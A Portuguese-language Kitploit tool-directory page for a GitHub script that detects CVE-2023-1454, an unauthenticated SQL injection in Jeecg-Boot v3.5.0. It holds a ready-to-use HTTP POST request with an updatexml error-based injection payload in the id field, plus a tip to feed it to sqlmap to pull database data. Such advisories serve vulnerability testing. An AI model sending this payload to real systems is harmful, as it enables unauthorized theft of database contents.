Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-1454 — Script de detecção de vulnerabilidade CVE-2023-1454 | Kitploit
Ferramentas/GitHubGitHub/bugfor-pings/cve-2023-1454
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubbugfor-pings/cve-2023-1454

CVE-2023-1454

Script de detecção de vulnerabilidade CVE-2023-1454

Ver Repositório
1há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-1454

Script de detecção da vulnerabilidade CVE-2023-1454

Este artigo é apenas para referência. Não utilize as informações técnicas e ferramentas aqui contidas para realizar invasões em qualquer sistema de computador sem autorização. Quaisquer consequências diretas ou indiretas e danos decorrentes do uso das informações fornecidas neste documento são de responsabilidade exclusiva do usuário.

Introdução

Jeecg-Boot é uma plataforma de desenvolvimento low-code baseada em geradores de código. Ela oferece uma série de funcionalidades, como geradores de código, mecanismos de template, gerenciamento de permissões, dicionário de dados, importação e exportação de dados, entre outras, ajudando os desenvolvedores a construir rapidamente aplicações empresariais.

Resumo da vulnerabilidade

A plataforma Java low-code para aplicações web empresariais Jeecg-Boot (v3.5.0) utiliza o arquivo jimureport-spring-boot-starter-1.5.6.jar. O Jeecg-Boot apresenta uma falha na filtragem de caracteres especiais. Na versão v3.5.0 com frontend Vue3, existe uma vulnerabilidade de injeção SQL não autenticada. O ponto de vulnerabilidade ocorre quando o caminho /querySql é chamado, pois o SQL invocado não trata adequadamente o parâmetro id, permitindo diretamente uma injeção baseada em erro. Um atacante remoto não autenticado, ao construir uma string especialmente elaborada, pode obter informações confidenciais do banco de dados alvo.

Versões afetadas

Versão afetada: Jeecg-Boot = v3.5.0

Salve o pacote como txt e use o sqlmap para obter os dados:

root@kitploit:~
POST /jmreport/qurestSql HTTP/1.1
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

Baixar ferramenta